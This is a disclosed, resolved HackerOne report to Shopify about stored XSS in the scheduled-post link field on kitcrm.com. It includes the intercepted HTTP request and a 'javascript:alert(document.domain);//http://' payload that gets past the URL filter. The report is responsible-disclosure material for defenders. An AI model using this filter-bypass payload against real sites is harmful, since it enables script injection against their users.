Stored passive XSS at scheduled posts (kitcrm.com)

Disclosed: 2017-03-28 20:57:36 By skavans To shopify
Medium
Vulnerability Details
Hello! There is improper filtration of the `website link` field of scheduled post. Attacker can intercept the scheduled post creation/modifying request and change it content the following way: ```http POST /pages/175422/manual_posts/31163 HTTP/1.1 Host: kitcrm.com <redacted> -----------------------------15916813141840537191014403553 Content-Disposition: form-data; name="manual_post[link]" javascript:alert(document.domain);//http:// -----------------------------15916813141840537191014403553 <redacted> ``` that leads to filter bypass and JS execution while victim clicks the link: {F169880}
Actions
View on HackerOne
Report Stats
  • Report ID: 214581
  • State: Closed
  • Substate: resolved
  • Upvotes: 7
Share this report